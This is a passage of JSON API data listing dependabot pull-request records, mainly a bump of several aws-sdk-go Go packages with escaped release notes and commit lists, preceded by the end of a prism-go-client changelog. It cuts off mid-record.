href=\"https://github.com/sauravknx\"\u003e\u003ccode\u003e@​sauravknx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/339\"\u003enutanix-cloud-native/prism-go-client#339\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: split error handling into contract and v4 implementation by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/342\"\u003enutanix-cloud-native/prism-go-client#342\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add ListNicsByVmId to VMs service by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/352\"\u003enutanix-cloud-native/prism-go-client#352\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: Add UUID in the URL path for UpdateK8sRegistration by \u003ca href=\"https://github.com/priyadarshini7q\"\u003e\u003ccode\u003e@​priyadarshini7q\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/335\"\u003enutanix-cloud-native/prism-go-client#335\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.1...v0.7.2\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.1...v0.7.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and rena...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10771","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10771","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10771/packages"},{"uuid":"4436240734","node_id":"PR_kwDOAOaWjc7bB66i","number":124765,"state":"closed","title":"deps(go): bump the aws-sdk-go group across 1 directory with 9 updates","user":"dependabot[bot]","labels":["area/backend","dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-14T02:17:17.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-13T08:33:43.000Z","updated_at":"2026-05-14T02:17:26.000Z","time_to_close":63814,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(go): bump","group_name":"aws-sdk-go","update_count":9,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.32.15","new_version":"1.32.16","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatch","old_version":"1.45.3","new_version":"1.56.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.296.0","new_version":"1.299.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/oam","old_version":"1.18.3","new_version":"1.23.16","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi","old_version":"1.26.6","new_version":"1.31.11","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/secretsmanager","old_version":"1.40.1","new_version":"1.41.6","repository_url":"https://github.com/aws/aws-sdk-go-v2"}],"path":null,"ecosystem":"go"},"body":"Bumps the aws-sdk-go group with 7 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.32.15` | `1.32.16` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatch](https://github.com/aws/aws-sdk-go-v2) | `1.45.3` | `1.56.2` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.296.0` | `1.299.0` |\n| [github.com/aws/aws-sdk-go-v2/service/oam](https://github.com/aws/aws-sdk-go-v2) | `1.18.3` | `1.23.16` |\n| [github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.31.11` |\n| [github.com/aws/aws-sdk-go-v2/service/secretsmanager](https://github.com/aws/aws-sdk-go-v2) | `1.40.1` | `1.41.6` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.32.15 to 1.32.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.32.15...config/v1.32.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.19.14 to 1.19.15\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/credentials/v1.19.14...credentials/v1.19.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatch` from 1.45.3 to 1.56.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5a964704cb2640ed57a74b9b37a53dcda7b6b7dd\"\u003e\u003ccode\u003e5a96470\u003c/code\u003e\u003c/a\u003e Release 2024-12-19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/653aa807b912e104f5e1e84e0510b4dffd76c751\"\u003e\u003ccode\u003e653aa80\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d02b239e896c5791e295c9a30a5281f56a8f7c39\"\u003e\u003ccode\u003ed02b239\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/698d709c21bc7922489aaba8c8207c9d7253c2fe\"\u003e\u003ccode\u003e698d709\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/885de40869f9bcee29ad11d60967aa0f1b571d46\"\u003e\u003ccode\u003e885de40\u003c/code\u003e\u003c/a\u003e Fix improper use of Printf-style functions (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2934\"\u003e#2934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/858298a55393392fb161c5bd0ae3b9c5251996bf\"\u003e\u003ccode\u003e858298a\u003c/code\u003e\u003c/a\u003e Release 2024-12-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f58264af808a255782999422056bccb06552dcbd\"\u003e\u003ccode\u003ef58264a\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/df31082d87044a000a1524dbb654651f32713e10\"\u003e\u003ccode\u003edf31082\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/346690ed8f5b974ab26532aa93d5fa92a58d3571\"\u003e\u003ccode\u003e346690e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/45154546e09b48505c8798f7e5f3846ee1e0453a\"\u003e\u003ccode\u003e4515454\u003c/code\u003e\u003c/a\u003e Release 2024-12-17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/rds/v1.45.3...service/ssm/v1.56.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.296.0 to 1.299.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/18fee87f2c0615b0e5c3f28f1b95af810a9e77b5\"\u003e\u003ccode\u003e18fee87\u003c/code\u003e\u003c/a\u003e Release 2026-04-22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0ce157cd6b5427066ddb682a4967a3047230de4b\"\u003e\u003ccode\u003e0ce157c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/68cdb4a02d56b9d932fbfed22660cfa64e815ef6\"\u003e\u003ccode\u003e68cdb4a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f399972fb759f6ffd315963de511da785ef408e6\"\u003e\u003ccode\u003ef399972\u003c/code\u003e\u003c/a\u003e Bump Smithy from 1.67.0 to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3394\"\u003e#3394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3c19a9b3eb17f48f6b9fc1cad644859d062775ad\"\u003e\u003ccode\u003e3c19a9b\u003c/code\u003e\u003c/a\u003e Release 2026-04-21\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1dfac3ec5a6c560e6fee389d0f1f364eb57ae616\"\u003e\u003ccode\u003e1dfac3e\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d842df6fcef5ecc94e2133cb1d96fac4926aadb4\"\u003e\u003ccode\u003ed842df6\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ffeb52a25097274529920d8f91b4ca27f7b636a9\"\u003e\u003ccode\u003effeb52a\u003c/code\u003e\u003c/a\u003e bump to latest smithy-go codegen (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3393\"\u003e#3393\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e839880e8d30897bd8a7684d83626d81f82c565a\"\u003e\u003ccode\u003ee839880\u003c/code\u003e\u003c/a\u003e Release 2026-04-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4c898c88577f4102793d3e15de05ad3b5b1e2ef5\"\u003e\u003ccode\u003e4c898c8\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.296.0...service/ec2/v1.299.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/oam` from 1.18.3 to 1.23.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/54aed732316b5162e5c4382a1f2d3891175d0254\"\u003e\u003ccode\u003e54aed73\u003c/code\u003e\u003c/a\u003e Release 2025-02-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/082781faee876f9d612fa7c113b4304a29766b14\"\u003e\u003ccode\u003e082781f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3ed185b604684a86547e679154975f1914f97312\"\u003e\u003ccode\u003e3ed185b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/03da7378d668622cd880ec741d57e93cc370efa1\"\u003e\u003ccode\u003e03da737\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8a8ccb619ffbfe00e99a83e99729b948f20be29\"\u003e\u003ccode\u003ec8a8ccb\u003c/code\u003e\u003c/a\u003e Bump go version to 1.22 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3010\"\u003e#3010\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8b7c7bf6d9a1c63d0c5262724ae8a15a44e366a6\"\u003e\u003ccode\u003e8b7c7bf\u003c/code\u003e\u003c/a\u003e fix missing AccountIDEndpointMode binding (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3013\"\u003e#3013\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90f9d1081a37acaf792ccda5bfb07e2ee7590a9e\"\u003e\u003ccode\u003e90f9d10\u003c/code\u003e\u003c/a\u003e Release 2025-02-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/40dd351c61c016749a3f4105cca0c965e7c66d7b\"\u003e\u003ccode\u003e40dd351\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/06352dfafe9067da1956229d6925efed328d5ff6\"\u003e\u003ccode\u003e06352df\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833566b553122ebd5bfa1237ee7c905a8db0d687\"\u003e\u003ccode\u003e833566b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.18.3...service/dax/v1.23.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi` from 1.26.6 to 1.31.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/67db6904b816b95073883b7ad378384c4839b28c\"\u003e\u003ccode\u003e67db690\u003c/code\u003e\u003c/a\u003e Release 2025-09-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/32ee1b5d75fc303c0626a6f5e769f4e08cc491a8\"\u003e\u003ccode\u003e32ee1b5\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0b431223309a815cffc048072556aa651ee1455f\"\u003e\u003ccode\u003e0b43122\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/44786d920f3627b73a99e81c7b6399dbfcf7ab42\"\u003e\u003ccode\u003e44786d9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c98edb73809256823906d7e307ecf3c9abc16700\"\u003e\u003ccode\u003ec98edb7\u003c/code\u003e\u003c/a\u003e update internal endpts comment that was wrong (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3194\"\u003e#3194\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/88da3c8c5569dece0e99802dab638faa047a0db0\"\u003e\u003ccode\u003e88da3c8\u003c/code\u003e\u003c/a\u003e Release 2025-09-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/74a74fc179f8bbd879383cc75fa29a1937266dcc\"\u003e\u003ccode\u003e74a74fc\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5e6f7ae6139ca69044bb706664b4dbdc31227a32\"\u003e\u003ccode\u003e5e6f7ae\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0e722ab42ff6bc6bb810c2937b8e1b41937e17c3\"\u003e\u003ccode\u003e0e722ab\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/41a7d004b9ff794f6007d30168afc825031f2c61\"\u003e\u003ccode\u003e41a7d00\u003c/code\u003e\u003c/a\u003e Release 2025-09-24\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.31.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/secretsmanager` from 1.40.1 to 1.41.6\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca 